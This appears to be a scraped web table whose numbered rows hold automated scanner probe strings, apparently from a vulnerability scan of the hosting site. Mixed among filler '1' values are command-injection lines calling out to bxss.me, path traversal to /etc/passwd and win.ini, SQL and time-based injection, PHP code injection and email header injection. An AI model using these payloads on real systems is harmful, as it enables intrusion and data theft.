| 1 |
1 |
1 |
1 |
| 2 |
1BofkfC90QO |
1 |
1 |
| 3 |
1 |
1v3xpoKbeO |
1 |
| 4 |
response.write(9722227*9839317) |
1 |
1 |
| 5 |
echo ppbpqf$()\ zqazib\nz^xyu||a #' &echo ppbpqf$( |
1 |
1 |
| 6 |
1 |
1 |
1DKnXHLVMrO |
| 7 |
UH1dyFwV |
1 |
1 |
| 8 |
&echo fdhcys$()\ mklieu\nz^xyu||a #' &echo fdhcys$ |
1 |
1 |
| 9 |
'+response.write(9722227*9839317)+' |
1 |
1 |
| 10 |
1 |
apOBtdbo |
1 |
| 11 |
|echo ssoflv$()\ egnlwk\nz^xyu||a #' |echo ssoflv$ |
1 |
1 |
| 12 |
"+response.write(9722227*9839317)+" |
1 |
1 |
| 13 |
1 |
1 |
AV9HzcIZ |
| 14 |
1 |
1 |
1 |
| 15 |
(nslookup hitdbrfgrvhtj1dad3.bxss.me||perl -e "get |
1 |
1 |
| 16 |
1 |
response.write(9141450*9831640) |
1 |
| 17 |
1 |
1 |
1 |
| 18 |
1 |
1 |
1 |
| 19 |
$(nslookup hitgwrgaxyyvn87a01.bxss.me||perl -e "ge |
1 |
1 |
| 20 |
1 |
'+response.write(9141450*9831640)+' |
1 |
| 21 |
1 |
1 |
1 |
| 22 |
&(nslookup hitgtkvzihnsofdf92.bxss.me||perl -e "ge |
1 |
1 |
| 23 |
1 |
"+response.write(9141450*9831640)+" |
1 |
| 24 |
../../../../../../../../../../../../../../etc/pass |
1 |
1 |
| 25 |
1 |
1 |
response.write(9524247*9785723) |
| 26 |
../../../../../../../../../../../../../../windows/ |
1 |
1 |
| 27 |
1 |
1 |
'+response.write(9524247*9785723)+' |
| 28 |
|(nslookup hittbjklwrzck01e40.bxss.me||perl -e "ge |
1 |
1 |
| 29 |
1 |
1 |
1 |
| 30 |
1 |
1 |
1 |
| 31 |
1 |
1 |
"+response.write(9524247*9785723)+" |
| 32 |
`(nslookup hitiquvqvvxbk67cc7.bxss.me||perl -e "ge |
1 |
1 |
| 33 |
../1 |
1 |
1 |
| 34 |
;(nslookup hithfbvrnbktfcc394.bxss.me||perl -e "ge |
1 |
1 |
| 35 |
1 |
1 |
1 |
| 36 |
1 |
../../../../../../../../../../../../../../etc/pass |
1 |
| 37 |
1 |
echo bopnrg$()\ yqvkxc\nz^xyu||a #' &echo bopnrg$( |
1 |
| 38 |
1 |
1 |
1 |
| 39 |
1 |
../../../../../../../../../../../../../../windows/ |
1 |
| 40 |
1 |
&echo gfzcff$()\ fclqaq\nz^xyu||a #' &echo gfzcff$ |
1 |
| 41 |
1 |
1 |
1 |
| 42 |
1 |
|echo zzjztm$()\ ioezkv\nz^xyu||a #' |echo zzjztm$ |
1 |
| 43 |
1 |
1 |
1 |
| 44 |
1 |
1 |
1 |
| 45 |
1 |
(nslookup hitngfrelxuqd75767.bxss.me||perl -e "get |
1 |
| 46 |
1 |
../1 |
1 |
| 47 |
1%0abcc:009247.10477-52079.10477.2562c.20295.2@bxs |
1 |
1 |
| 48 |
1 |
$(nslookup hithodyuuptxx5dd69.bxss.me||perl -e "ge |
1 |
| 49 |
1 |
1 |
../../../../../../../../../../../../../../etc/passwd |
| 50 |
1 |
1 |
1 |
| 51 |
to@example.com>%0d%0abcc:009247.10477-52080.10477. |
1 |
1 |
| 52 |
1 |
1 |
../../../../../../../../../../../../../../windows/win.ini |
| 53 |
1 |
&(nslookup hitklaclzcdql5ef95.bxss.me||perl -e "ge |
1 |
| 54 |
1 |
1 |
1 |
| 55 |
1 |
1%0abcc:009247.10477-52081.10477.2562c.20295.2@bxs |
1 |
| 56 |
1 |
1 |
1 |
| 57 |
1 |
to@example.com>%0d%0abcc:009247.10477-52082.10477. |
1 |
| 58 |
1 |
|(nslookup hitnshflaamxt0b566.bxss.me||perl -e "ge |
1 |
| 59 |
|
1 |
1 |
| 60 |
1 |
1 |
1%0abcc:009247.10477-52083.10477.2562c.20295.2@bxss.me |
| 61 |
1 |
`(nslookup hitpxenmukljz6e29c.bxss.me||perl -e "ge |
1 |
| 62 |
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'???? |
1 |
1 |
| 63 |
1 |
1 |
../1 |
| 64 |
1 |
1 |
to@example.com>%0d%0abcc:009247.10477-52084.10477.2562c.20295.2@bxss.me |
| 65 |
1 |
;(nslookup hithshsmhiizl6d375.bxss.me||perl -e "ge |
1 |
| 66 |
1 |
1 |
1 |
| 67 |
1 |
1 |
1 |
| 68 |
1 |
1 |
1 |
| 69 |
1 |
1 |
echo gomdte$()\ lfwrrt\nz^xyu||a #' &echo gomdte$()\ lfwrrt\nz^xyu||a #|" &echo gomdte$()\ lfwrrt\nz^xyu||a # |
| 70 |
1 |
1 |
1 |
| 71 |
-1 OR 2+632-632-1=0+0+0+1 -- |
1 |
1 |
| 72 |
1 |
1 |
1 |
| 73 |
1 |
1 |
1 |
| 74 |
1 |
|
1 |
| 75 |
-1 OR 2+683-683-1=0+0+0+1 |
1 |
1 |
| 76 |
1 |
1 |
&echo siihkj$()\ bwwjkf\nz^xyu||a #' &echo siihkj$()\ bwwjkf\nz^xyu||a #|" &echo siihkj$()\ bwwjkf\nz^xyu||a # |
| 77 |
1 |
1 |
1 |
| 78 |
1 |
1 |
1 |
| 79 |
-1' OR 2+853-853-1=0+0+0+1 -- |
1 |
1 |
| 80 |
1 |
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'???? |
1 |
| 81 |
1 |
1 |
|echo loplfj$()\ dpvicw\nz^xyu||a #' |echo loplfj$()\ dpvicw\nz^xyu||a #|" |echo loplfj$()\ dpvicw\nz^xyu||a # |
| 82 |
1 |
1 |
1 |
| 83 |
-1' OR 2+13-13-1=0+0+0+1 or 'YPLahefH'=' |
1 |
1 |
| 84 |
1 |
1 |
1 |
| 85 |
1 |
1 |
1 |
| 86 |
1 |
1 |
(nslookup hitxmgladqxziaa04e.bxss.me||perl -e "gethostbyname('hitxmgladqxziaa04e.bxss.me')") |
| 87 |
-1" OR 2+91-91-1=0+0+0+1 -- |
1 |
1 |
| 88 |
1 |
1 |
1 |
| 89 |
1 |
1 |
1 |
| 90 |
1 |
1 |
$(nslookup hitxfbomwepxtdb351.bxss.me||perl -e "gethostbyname('hitxfbomwepxtdb351.bxss.me')") |
| 91 |
1 |
1 |
|
| 92 |
1 |
1 |
1 |
| 93 |
1 |
1 |
1 |
| 94 |
1 |
1 |
1 |
| 95 |
1 |
1 |
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'???? |
| 96 |
1 |
1 |
&(nslookup hithjfsucsntl2eef9.bxss.me||perl -e "gethostbyname('hithjfsucsntl2eef9.bxss.me')")&'\"`0&(nslookup hithjfsucsntl2eef9.bxss.me||perl -e "get |
| 97 |
1 |
1 |
1 |
| 98 |
${10000459+10000485} |
1 |
1 |
| 99 |
1 |
1 |
|(nslookup hitfhwfewwsdg6847c.bxss.me||perl -e "gethostbyname('hitfhwfewwsdg6847c.bxss.me')") |
| 100 |
1 |
1 |
1 |
| 101 |
1 |
${9999446+10000115} |
1 |
| 102 |
1 |
1 |
`(nslookup hitlyabshujbd84744.bxss.me||perl -e "gethostbyname('hitlyabshujbd84744.bxss.me')")` |
| 103 |
http://some-inexistent-website.acu/some_inexistent |
1 |
1 |
| 104 |
1 |
1 |
${9999676+9999015} |
| 105 |
1 |
1 |
1 |
| 106 |
1 |
1 |
;(nslookup hithuyrftrutv82e74.bxss.me||perl -e "gethostbyname('hithuyrftrutv82e74.bxss.me')")|(nslookup hithuyrftrutv82e74.bxss.me||perl -e "gethostby |
| 107 |
1some_inexistent_file_with_long_name%00.jpg |
1 |
1 |
| 108 |
1 |
1 |
1 |
| 109 |
1 |
1 |
1 |
| 110 |
1 |
1 |
1 |
| 111 |
1 |
1 |
1 |
| 112 |
Http://bxss.me/t/fit.txt |
1 |
1 |
| 113 |
1 |
1 |
1 |
| 114 |
1 |
1 |
1 |
| 115 |
1 |
1 |
1 |
| 116 |
1&n923482=v964298 |
1 |
1 |
| 117 |
http://bxss.me/t/fit.txt%3F.jpg |
1 |
1 |
| 118 |
1 |
1 |
1 |
| 119 |
1 |
1 |
1 |
| 120 |
/etc/shells |
1 |
1 |
| 121 |
1 |
1 |
1 |
| 122 |
1 |
1&n969259=v980026 |
1 |
| 123 |
1 |
1 |
1 |
| 124 |
c:/windows/win.ini |
1 |
1 |
| 125 |
if(now()=sysdate(),sleep(15),0) |
1 |
1 |
| 126 |
) |
1 |
1 |
| 127 |
1 |
1 |
1 |
| 128 |
bxss.me |
1 |
1 |
| 129 |
1 |
1 |
1&n941184=v925534 |
| 130 |
!(()&&!|*|*| |
1 |
1 |
| 131 |
1 |
http://some-inexistent-website.acu/some_inexistent |
1 |
| 132 |
1 |
1 |
1 |
| 133 |
^(#$!@#$)(()))****** |
1 |
1 |
| 134 |
1 |
1some_inexistent_file_with_long_name%00.jpg |
1 |
| 135 |
1 |
1 |
1 |
| 136 |
1 |
1 |
1 |
| 137 |
1 |
Http://bxss.me/t/fit.txt |
1 |
| 138 |
1 |
1 |
1 |
| 139 |
1 |
) |
1 |
| 140 |
1 |
http://bxss.me/t/fit.txt%3F.jpg |
1 |
| 141 |
1 |
1 |
1 |
| 142 |
1 |
1 |
1 |
| 143 |
1 |
!(()&&!|*|*| |
1 |
| 144 |
1 |
/etc/shells |
1 |
| 145 |
1 |
^(#$!@#$)(()))****** |
1 |
| 146 |
1 |
1 |
1 |
| 147 |
1 |
c:/windows/win.ini |
1 |
| 148 |
1 |
1 |
1 |
| 149 |
1 |
1 |
) |
| 150 |
1 |
1 |
1 |
| 151 |
1 |
bxss.me |
1 |
| 152 |
'"() |
1 |
1 |
| 153 |
1 |
1 |
1 |
| 154 |
1 |
1 |
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg |
| 155 |
1 |
1 |
!(()&&!|*|*| |
| 156 |
1 |
1 |
1 |
| 157 |
1 |
1 |
1some_inexistent_file_with_long_name%00.jpg |
| 158 |
1 |
1 |
^(#$!@#$)(()))****** |
| 159 |
1 |
'"() |
1 |
| 160 |
1 |
1 |
1 |
| 161 |
1 |
1 |
Http://bxss.me/t/fit.txt |
| 162 |
1 |
1 |
1 |
| 163 |
1 |
1 |
http://bxss.me/t/fit.txt%3F.jpg |
| 164 |
1 |
1 |
1 |
| 165 |
1 |
1 |
'"() |
| 166 |
1 |
1 |
1 |
| 167 |
1 |
1 |
1 |
| 168 |
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z |
1 |
1 |
| 169 |
1 |
1 |
/etc/shells |
| 170 |
1 |
1 |
1 |
| 171 |
1 |
1 |
1 |
| 172 |
1 |
1 |
1 |
| 173 |
1 |
1 |
1 |
| 174 |
1 |
1 |
c:/windows/win.ini |
| 175 |
'.gethostbyname(lc('hitxy'.'prpealof8c1ca.bxss.me. |
1 |
1 |
| 176 |
1 |
1 |
1 |
| 177 |
1 |
1 |
1 |
| 178 |
".gethostbyname(lc("hitqp"."mbpgnrbcbc6d5.bxss.me. |
1 |
1 |
| 179 |
1 |
1 |
bxss.me |
| 180 |
1 |
1 |
1 |
| 181 |
1 |
1 |
1 |
| 182 |
1 |
1 |
1 |
| 183 |
1 |
'.gethostbyname(lc('hitzt'.'ooazknvk324dd.bxss.me. |
1 |
| 184 |
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')) |
1 |
1 |
| 185 |
1 |
1 |
1 |
| 186 |
1 |
1 |
1 |
| 187 |
1 |
".gethostbyname(lc("hitkd"."itjymzsea5b21.bxss.me. |
1 |
| 188 |
';print(md5(31337));$a=' |
1 |
1 |
| 189 |
HttP://bxss.me/t/xss.html?%00 |
1 |
1 |
| 190 |
1 |
1 |
'.gethostbyname(lc('hitcq'.'ykrcxjqg408ef.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(90).chr(116).chr(86).' |
| 191 |
1 |
1 |
1 |
| 192 |
";print(md5(31337));$a=" |
1 |
1 |
| 193 |
bxss.me/t/xss.html?%00 |
1 |
1 |
| 194 |
1 |
1 |
".gethostbyname(lc("hityr"."zqjwcxhb4bc1c.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(77).chr(106).chr(78)." |
| 195 |
${@print(md5(31337))} |
1 |
1 |
| 196 |
1 |
1 |
1 |
| 197 |
1 |
HttP://bxss.me/t/xss.html?%00 |
1 |
| 198 |
1 |
1 |
1 |
| 199 |
${@print(md5(31337))}\ |
1 |
1 |
| 200 |
1 |
1 |
1 |
| 201 |
1 |
bxss.me/t/xss.html?%00 |
1 |
| 202 |
1 |
1 |
1 |
| 203 |
'.print(md5(31337)).' |
1 |
1 |
| 204 |
1 |
1 |
1 |
| 205 |
1 |
1 |
1 |
| 206 |
1 |
1 |
HttP://bxss.me/t/xss.html?%00 |
| 207 |
1 |
1 |
1 |
| 208 |
1 |
1 |
bxss.me/t/xss.html?%00 |
| 209 |
1 |
1 |
1 |
| 210 |
1 |
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')) |
1 |
| 211 |
"+"A".concat(70-3).concat(22*4).concat(101).concat |
1 |
1 |
| 212 |
1 |
1 |
1 |
| 213 |
1 |
1 |
1 |
| 214 |
1 |
';print(md5(31337));$a=' |
1 |
| 215 |
'+'A'.concat(70-3).concat(22*4).concat(104).concat |
1 |
1 |
| 216 |
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z |
1 |
1 |
| 217 |
1 |
1 |
1 |
| 218 |
1 |
1 |
1 |
| 219 |
1 |
"+"A".concat(70-3).concat(22*4).concat(97).concat( |
1 |
| 220 |
1 |
1 |
1 |
| 221 |
1 |
1 |
1 |
| 222 |
1 |
1 |
1 |
| 223 |
1 |
";print(md5(31337));$a=" |
1 |
| 224 |
1 |
'+'A'.concat(70-3).concat(22*4).concat(97).concat( |
1 |
| 225 |
1 |
1 |
1 |
| 226 |
1 |
1 |
"+"A".concat(70-3).concat(22*4).concat(99).concat(79).concat(116).concat(75)+(require"socket"
Socket.gethostbyname("hitld"+"wwqhrsce09366.bxss.me.")[3 |
| 227 |
1 |
${@print(md5(31337))} |
1 |
| 228 |
)))))))))))))))))))))))))))))))))))))))))))))))))) |
1 |
1 |
| 229 |
1 |
1 |
1 |
| 230 |
1 |
${@print(md5(31337))}\ |
1 |
| 231 |
1 |
1 |
'+'A'.concat(70-3).concat(22*4).concat(97).concat(66).concat(105).concat(78)+(require'socket'
Socket.gethostbyname('hitgt'+'rklzalmq06fba.bxss.me.')[3 |
| 232 |
1 |
)))))))))))))))))))))))))))))))))))))))))))))))))) |
1 |
| 233 |
1 |
1 |
1 |
| 234 |
1 |
1 |
1 |
| 235 |
1 |
'.print(md5(31337)).' |
1 |
| 236 |
1 |
1 |
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) |
| 237 |
1 |
1 |
1 |
| 238 |
1 |
1 |
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); |
| 239 |
1 |
1 |
1 |
| 240 |
1 |
1 |
1 |
| 241 |
1 |
1 |
';print(md5(31337));$a=' |
| 242 |
1 |
1 |
1 |
| 243 |
1 |
1 |
1 |
| 244 |
1 |
1 |
";print(md5(31337));$a=" |
| 245 |
1 |
1 |
1 |
| 246 |
/xfs.bxss.me |
1 |
1 |
| 247 |
'" |
1 |
1 |
| 248 |
1 |
1 |
${@print(md5(31337))} |
| 249 |
1'"()&% |
1 |
1 |
| 250 |
1 |
/xfs.bxss.me |
1 |
| 251 |
|